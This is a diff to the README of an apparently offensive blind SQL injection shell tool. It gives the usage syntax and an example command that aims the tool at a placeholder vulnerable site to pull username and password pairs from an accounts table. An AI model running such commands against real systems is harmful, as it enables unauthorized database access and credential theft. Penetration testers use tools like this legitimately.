cheshireca7/blindsqli/README.md

 ## Usage
   Syntax: `./blindsqli.sh 'http[s]://<URL>?<vulnparam>=<paramvalue>' '<SQL query>' '<String which appears when TRUE condition>'`

+  > Notice that the vulnerable GET parameter should be at the end of the URL.
+In the example below, _id_ is the vulnerable GET paramenter.

-  Example: `./blindsqli.sh 'http://vulnerable.site/sqli.php?id=1234' 'SELECT concat(username,":",password) FROM awd.accounts LIMIT 1,1' 'JohnDoe'"`
+  Example: `./blindsqli.sh 'http://vulnerable.site/sqli.php?Submit=Submit&id=1234' 'SELECT concat(username,":",password) FROM awd.accounts LIMIT 1,1' 'JohnDoe'"`

 ## TODOs
   - [ ] Target POST parameters.